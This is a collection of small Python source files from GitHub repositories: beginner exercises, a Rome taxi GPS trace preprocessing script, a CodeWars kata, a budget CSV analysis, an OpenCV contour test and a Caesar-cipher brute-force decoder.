+{"seq_id":"36514171681","text":"'''\nSlice. Write code that rearranges all the elements of array\n\nx with even indices in reverse order.\n\nI.e. if x = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9], the code should\n\nproduce [8, 1, 6, 3, 4, 5, 2, 7, 0, 9].\n\nreplace\n\nReplacing each next element of the array with an odd one\n'''\n\n\n\n\n\nlist = []\nfor i in range(10):\n\tlist.append(i)\n\t'''\n\tif(i % 2 != 0):\n\t\tne.append(i)\n\tif(i % 2 == 0):\n\t\tch.append(i)\n\tlist = ne + ch\n\t'''\n\t\n'[1, 3, 5, 7, 9, 0, 2, 4, 6, 8]'\n\nlist[::2] = list[::2][::-1]\nprint(list)\n\n'''\nprint(ne)\nprint(ch)\nprint(list)\nprint(arr)\n'''\n\n'''\nif(x[i] % 2 != 0):\n\tlist = list(x[i])\n\tlist.replace(ne, ch)\nprint(x)\n\t\n'''\n\n\n\t\n\t\n","repo_name":"Sinsjar/-","sub_path":"Work_1_Done/3.3.5.py","file_name":"3.3.5.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4851916796","text":"# 1.1. Print the numbers 31, 18 and 79 on one line with a single space between them. Do not use the text '31 18 79'.\n\n# Easter egg. The concatenation operation\n\n# Input data. Assigning values to variables, option 1.\na = 31\nb = 18\nc = 79\n# Input data. 
Assigning values to variables using a list, option 2.\n# a, b, c = [31, 18, 79]\n\n# Answer v.1.\nd = str(a)\ne = str(b)\nf = str(c)\nresult = d + \" \" + e + \" \" + f\nprint(\"Answer 1: \", result)\n\n# Answer v.2.\nresult = str(a) + \" \" + str(b) + \" \" + str(c)\nprint(\"Answer 2: \", result)\n\n# Answer v.3.\nprint(\"Answer 3: \", str(a) + \" \" + str(b) + \" \" + str(c))\n\n\n# Answer v.4.\n# Using the concatenate() function\ndef concatenate(x: int, y: int, z: int) -> str:\n    return str(x) + \" \" + str(y) + \" \" + str(z)\n\n\nprint(\"Answer 4: \", concatenate(a, b, c))\n","repo_name":"r-oleg-official/1440_tasks_python","sub_path":"1.1.py","file_name":"1.1.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"8279622336","text":"# Question 10: Define a 3 x 3 square matrix, extract the main diagonal as a vector,\r\n# then create a diagonal matrix from that extracted vector \r\nimport numpy as np\r\n\r\ndef MatrixMaker(rows, columns):\r\n    a = [int(input(\"=>\")) for i in range(rows * columns)]\r\n    a = np.array(a)\r\n    a = a.reshape(rows, columns)\r\n    return a\r\n\r\nrows = 3\r\ncolumns = 3\r\n\r\nprint(f\"Enter the elements of the {rows}x{columns} matrix\")\r\nmatrix_1 = MatrixMaker(rows, columns)\r\n\r\n# extracting vector and making diagonal matrix\r\ndiagonalMatrix = [] \r\n\r\n# extracting vector using a loop that only iterates the diagonal elements \r\nvector = [matrix_1[i][j] for i, j in zip(range(rows), range(columns))]\r\nvector = np.array(vector)  # converting to vector\r\n\r\n# making diagonal matrix using vector\r\nfor i in range(rows):\r\n    for j in range(columns):\r\n        if i == j: diagonalMatrix.append(vector[i]) \r\n        else: diagonalMatrix.append(0)\r\n# You can use a single line of code for making the diagonal matrix \r\n# diagonalMatrix = [matrix_1[i][j] if i == j else 0 for i, j in [(i, j) for i in range(rows) for j in range(columns)]] \r\ndiagonalMatrix = np.array(diagonalMatrix)\r\ndiagonalMatrix = diagonalMatrix.reshape(rows, columns)\r\n\r\n# printing all values\r\nprint(\"Matrix \\n\", matrix_1)\r\nprint(\"Vector \\n\", vector)\r\nprint(\"Diagonal Matrix \\n\", diagonalMatrix)","repo_name":"ChristyBinu-4/Lab-assignments","sub_path":"1st Sem/mathematics/Set 2/Set2-10.py","file_name":"Set2-10.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
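# Aside (my addition, not part of the exercise above): numpy can do both steps
# in one call each: np.diag(m) extracts the main diagonal of a 2-D array, and
# np.diag(v) builds a diagonal matrix from a 1-D vector.
import numpy as np
m = np.arange(1, 10).reshape(3, 3)
print(np.diag(np.diag(m)))  # keeps [1, 5, 9] on the diagonal, zeros elsewhere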
+{"seq_id":"25222132665","text":"\"\"\"\nslightly more efficient 'chunker.py' script\npc0179 on the Kboard\npython 3+ throughout\n\n1. load basic/raw csv file\n2. filter duplicates\n3. add intelligent columns (later for database)\n4. output - csv or straight to db?\n\n5. once in db...\n- drop rows outside of bbox?\n- take average of rows with identical time_stamps...\n- some estimate of (instant?) velocity\n\n\"\"\"\n\nimport pandas as pd\nimport datetime as DT\nimport numpy as np\nimport RomeTaxiGlobalVars as RTGV\nimport re\n\n\n#--------------------------\n# Temporal funcs...\n\nglobal sim_start_time\nsim_start_time = DT.datetime.strptime(RTGV.sim_start_time, '%Y-%m-%d %H:%M:%S')\n\n\ndef PyDateTimeConv(csv_time):\n\tchopped_csv_time = csv_time[:-3]\n\tif len(chopped_csv_time) < 20:\n\t\tpy_time = DT.datetime.strptime(chopped_csv_time, '%Y-%m-%d %H:%M:%S')\n\telse:\n\t\tpy_time_ms = DT.datetime.strptime(chopped_csv_time, '%Y-%m-%d %H:%M:%S.%f')\n\t\tpy_time = RoundTimeSeconds(py_time_ms)\n\treturn py_time\n\ndef RoundTimeSeconds(some_DT_obj):\n\tif some_DT_obj.microsecond >= 5e5:\n\t\tsome_DT_obj = some_DT_obj + DT.timedelta(seconds=1)\n\treturn some_DT_obj.replace(microsecond=0)\n\ndef SimuTime(some_DT_obj):\n#\tsim_start_time = '2014-02-01 00:00:00'\n\t#if sim_start_time == None:\n\t#\tsim_start_time =\n\tglobal sim_start_time\n\tsim_time_s = (some_DT_obj-sim_start_time).total_seconds()\n\tsim_daynum = (some_DT_obj-sim_start_time).days  # timedelta.days is an attribute, not a method\n\tsim_weekday = some_DT_obj.weekday()\n\treturn sim_time_s,sim_daynum,sim_weekday\n\ndef SimDayNum(some_DT_obj):\n\tglobal sim_start_time\n\t#sim_daynum = (some_DT_obj-sim_start_time).days\n\tsim_daynum = some_DT_obj.day - sim_start_time.day\n\t# since rome taxi trace data spans slightly over two months, the following edit was necessary to ensure a correct day count\n\tif some_DT_obj.month == 3:\n\t\tsim_daynum = sim_daynum + 29\n\treturn int(sim_daynum)\n\ndef SimWeekDayNum(some_DT_obj):\n\tsim_weekday = some_DT_obj.weekday()\n\treturn sim_weekday\n\ndef SimTimeSeconds(some_DT_obj):\n\tglobal sim_start_time\n\tsim_time_s = (some_DT_obj-sim_start_time).total_seconds()\n\treturn int(sim_time_s)\n\ndef PyUnixTimeConv(some_DT_obj):\n\t\"\"\" func to convert DateTime Obj to Unix Epoch time, in SECONDS, hence rounding\"\"\"\n\toutput_unix_time = some_DT_obj.timestamp()\n\treturn round(output_unix_time)\n\n\n\n# ---------------------------------------\n# spatial stuff/funcs\n\n\ndef LatConv2(GPS_str):\n\tnumeric_const_pattern = '[-+]? (?: (?: \\d* \\. \\d+ ) | (?: \\d+ \\.? ) )(?: [Ee] [+-]? \\d+ ) ?'\n\trx = re.compile(numeric_const_pattern, re.VERBOSE)\n\ta = rx.findall(GPS_str)\n\tlat1 = round(float(a[0]), 6)\n\treturn lat1\n\ndef LongConv2(GPS_str):\n\tnumeric_const_pattern = '[-+]? (?: (?: \\d* \\. \\d+ ) | (?: \\d+ \\.? ) )(?: [Ee] [+-]? 
\d+ ) ?'\n\trx = re.compile(numeric_const_pattern, re.VERBOSE)\n\ta = rx.findall(GPS_str)\n\tlong1 = round(float(a[1]), 6)\n\treturn long1\n\n\ndef haversine_pc(lon1, lat1, lon2, lat2):\n    lon1, lat1, lon2, lat2 = map(np.radians, [lon1, lat1, lon2, lat2])\n    dlon = lon2 - lon1\n    dlat = lat2 - lat1\n    a = np.sin(dlat/2.0)**2 + np.cos(lat1) * np.cos(lat2) * np.sin(dlon/2.0)**2\n    c = 2 * np.arcsin(np.sqrt(a))\n    Hdistance = 6371e3 * c  # working in metres!\n    return Hdistance\n\n\ndef LatLong2XYConv(latitude, longitude, datumlat, datumlong):\n    # haversine_pc expects (lon1, lat1, lon2, lat2)\n    y = round(haversine_pc(datumlong, latitude, datumlong, datumlat))\n    x = round(haversine_pc(longitude, datumlat, datumlong, datumlat))\n\n    if latitude < datumlat:  # IMPLIES taxi is south of datum (South=-ve),(North=+ve)\n        y = -y\n    if longitude < datumlong:  # IMPLIES taxi is west of datum (West=-ve),(East=+ve)\n        x = -x\n\n    return [x, y]\n\ndef Long2XConv(longitude):\n    datumlat = RTGV.DatumLat\n    datumlong = RTGV.DatumLong\n    x = round(haversine_pc(longitude, datumlat, datumlong, datumlat))\n    if longitude < datumlong:  # IMPLIES taxi is west of datum (West=-ve),(East=+ve)\n        x = -x\n    return int(x)\n\ndef Lat2YConv(latitude):\n    datumlat = RTGV.DatumLat\n    datumlong = RTGV.DatumLong\n    y = round(haversine_pc(datumlong, latitude, datumlong, datumlat))\n    if latitude < datumlat:  # IMPLIES taxi is south of datum (South=-ve),(North=+ve)\n        y = -y\n    return int(y)\n\n\n\nnew_dfcols = ['taxi_id','dt_ts','unix_ts','weekday','trace_day','latitude','longitude','x','y']\nnew_tracedf = pd.DataFrame(columns=new_dfcols)\n\n# output file\noutput_trace_file = '/home/pietro/Taxi-Datasets/initial_filtered_rome_trace.csv'\nnew_tracedf.to_csv(output_trace_file, header=new_dfcols, index=False, sep=\";\")\n\n# Obtain Chunk of Data from text file\nraw_trace_data_filename = '/home/pietro/Taxi-Datasets/rome_taxi_trace_feb.txt'\n\n\nreader = pd.read_table(raw_trace_data_filename, sep=\";\", chunksize=20000, header=None, iterator=True)\nchunk_index = 0\nfor chunk in reader:\n    chunk_index += 1\n    new_tracedf = pd.DataFrame(columns=new_dfcols)\n    tracedf = chunk\n\n# duplicate removal, still haven't decided what to do with entries with identical ts but different long/lats...\n# remove entries outside of bounding box later?\n\n    tracedf = tracedf.drop_duplicates()\n\n\n    tracedf.columns = ['taxi_id','ts','gps']\n# taxi ID's \n    new_tracedf['taxi_id'] = tracedf['taxi_id']\n\n# Trace data timestamps\n    new_tracedf['dt_ts'] = tracedf['ts'].apply(PyDateTimeConv)\n    new_tracedf['unix_ts'] = new_tracedf['dt_ts'].apply(PyUnixTimeConv)\n    new_tracedf['weekday'] = new_tracedf['dt_ts'].apply(SimWeekDayNum)\n    new_tracedf['trace_day'] = new_tracedf['dt_ts'].apply(SimDayNum)\n\n# Taxi locations\n    new_tracedf['latitude'] = tracedf['gps'].apply(LatConv2)\n    new_tracedf['longitude'] = tracedf['gps'].apply(LongConv2)\n\n    new_tracedf['x'] = new_tracedf['longitude'].apply(Long2XConv)\n    new_tracedf['y'] = new_tracedf['latitude'].apply(Lat2YConv)\n\n\n    new_tracedf.to_csv(output_trace_file, mode='a', index=False, sep=\";\", header=False)\n\n\n","repo_name":"pc0179/RomeTaxiData","sub_path":"taxi_trace_import.py","file_name":"taxi_trace_import.py","file_ext":"py","file_size_in_byte":5751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
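# A quick sanity check of the haversine helper above (my own illustration, not
# part of the original script): one degree of latitude is roughly 111 km, and
# the helper works in metres.
import numpy as np

def haversine_check(lon1, lat1, lon2, lat2):
    # same formula as haversine_pc: great-circle distance on a 6371 km sphere
    lon1, lat1, lon2, lat2 = map(np.radians, [lon1, lat1, lon2, lat2])
    a = np.sin((lat2 - lat1) / 2.0) ** 2 + np.cos(lat1) * np.cos(lat2) * np.sin((lon2 - lon1) / 2.0) ** 2
    return 6371e3 * 2 * np.arcsin(np.sqrt(a))

print(round(haversine_check(12.5, 41.9, 12.5, 42.9)))  # ~111195 metres for 1 degree of latitude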
+{"seq_id":"44531267389","text":"\"\"\"\r\nSolution to the CodeWars kata Does my number look big in this?\r\nLink:\r\nhttps://www.codewars.com/kata/5287e858c6b5a9678200083c\r\n\"\"\"\r\n\r\ndef narcissistic(value):\r\n    # A Narcissistic Number is a number which is the sum of its own digits, each raised to the power of the number of digits in a given base. In this Kata, we will restrict ourselves to decimal (base 10).\r\n    # For example, take 153 (3 digits): 1^3 + 5^3 + 3^3 = 1 + 125 + 27 = 153 and 1634 (4 digits): 1^4 + 6^4 + 3^4 + 4^4 = 1 + 1296 + 81 + 256 = 1634 \r\n    # The Challenge: Your code must return true or false depending upon whether the given number is a Narcissistic number in base 10.\r\n    number = str(value)\r\n    num = 0\r\n    for ch in number:\r\n        num += int(ch)**len(number)\r\n    return num == value\r\n\r\n# --------------------------------------------Extras--------------------------------------------\r\n\r\n# Other solutions\r\n\r\ndef narcissistic2(value):\r\n    vstr = str(value)\r\n    nvalue = sum(int(i)**len(vstr) for i in vstr)\r\n    return nvalue == value\r\n","repo_name":"DavidSiretMarques/CodeWars-Katas","sub_path":"6kyu/does-my-number-look-big-in-this.py","file_name":"does-my-number-look-big-in-this.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"8280262556","text":"# Import dependencies\r\nimport os\r\nimport csv\r\n\r\n# Create Path\r\ninput_path = os.path.join('..', 'Resources', 'budget_data.csv') \r\n\r\n# Open and Read File\r\nwith open(input_path) as csvfile:\r\n\r\n# CSV reader \r\n    csvreader = csv.reader(csvfile, delimiter=',')\r\n\r\n    print(csvreader)\r\n\r\n\r\n# Read the header row first\r\n    csv_header = next(csvreader)\r\n    print(f\"CSV Header: {csv_header}\")\r\n\r\n# Store Variables\r\n    months = []\r\n    profit = [] \r\n    change_in_profit = []\r\n\r\n\r\n# Read each row of data after the header\r\n    for row in csvreader:\r\n        print(row)\r\n        months.append(row[0])\r\n        profit.append(int(row[1]))\r\n\r\n\r\n\r\n# The total number of months included in the dataset\r\nprint(f\"Total_Months: {len(months)}\") \r\n\r\n# The net total amount of \"Profit/Losses\" over the entire period \r\nprint(f\"Total_Profit: ${sum(profit)}\")\r\n\r\n\r\n# Calculate the changes in \"Profit/Losses\" over the entire period, then find the average of those changes\r\n\r\nfor p in range(len(profit)-1):\r\n    change_in_profit.append(profit[p+1]-profit[p])\r\n\r\n\r\nprint(f\"Average Change: ${round(sum(change_in_profit)/len(change_in_profit),2)}\") \r\n\r\n# The greatest increase in profits (date and amount) over the entire period\r\n\r\ngreatest_increase = max(change_in_profit)\r\ngreatest_increase_month = change_in_profit.index(max(change_in_profit)) + 1\r\nprint(f\"Greatest_Increase: {months[greatest_increase_month]} (${greatest_increase})\")\r\n\r\n# The greatest decrease in losses (date and amount) over the entire period\r\n\r\ngreatest_decrease = min(change_in_profit)\r\ngreatest_decrease_month = change_in_profit.index(min(change_in_profit)) + 1\r\nprint(f\"Greatest_Decrease: {months[greatest_decrease_month]} (${greatest_decrease})\")\r\n\r\n\r\n","repo_name":"chrisvaslaw/pythonhw-resubmitted-","sub_path":"mainbank.py","file_name":"mainbank.py","file_ext":"py","file_size_in_byte":1684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36355910915","text":"import numpy as np\nimport cv2\n\n\n#img = cv2.imread('/Users/SimonDahan/Documents/Telecom-ParisTech/PACT/Estimation du mouvement/OpenCvtest/bandcontour.png',0)\n#imgray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\nimg = cv2.imread('/Users/SimonDahan/Documents/Telecom-ParisTech/PACT/Estimation du mouvement/OpenCvtest/bandecontour.png')\ngray = 
cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\nret, thresh = cv2.threshold(gray, 127, 255, 0)\ncontours, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\ncnt = contours[4]\nimg2 = cv2.drawContours(gray, [cnt], 0, (0,255,0), 3)\ncv2.imshow('test', img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n#cv2.imwrite('testcv.jpg',img2)","repo_name":"Fran-cois/SmartDelivery","sub_path":"src/Estimation_mouvement/OpenCv/contourCV.py","file_name":"contourCV.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"6243792613","text":"cases = int(input())\nall = []\nfor i in range(cases):\n    case = input()\n    all.append(case)\nfirst = all[0]\nsecond = None\nfirstcount = 0\nfor i in all:\n    if i == first:\n        firstcount += 1\n    else:\n        second = i\nif firstcount > len(all) - firstcount:\n    print(first)\nelse:\n    print(second)\n","repo_name":"MohammedTAgha/Brain-fu__n","sub_path":"ICPC TRAINING/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13007517982","text":"import sys\n\nargc = len(sys.argv)\n\nif argc == 1:\n\tword = input(\"Word to decrypt: \")\nelse:\n\tword = sys.argv[1]\n\nword = word.lower()\n\nfor key in range(1, 26):\n\tprint(f\"key: {key} | \", end='')\n\tfor c in word:\n\t\tprint(chr((ord(c) - ord('a') - key) % 26 + ord('a')), end='')\n\tprint()","repo_name":"maylisw/cryptography","sub_path":"caesar/brute_force.py","file_name":"brute_force.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
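# A worked instance of the decryption formula in brute_force.py above (my own
# note): for c='d' and key=3, (ord('d') - ord('a') - 3) % 26 + ord('a') equals
# (3 - 3) % 26 + 97 = 97, and chr(97) == 'a'; each letter shifts back `key`
# places, with the modulo providing the wrap-around.
print(chr((ord('d') - ord('a') - 3) % 26 + ord('a')))  # -> a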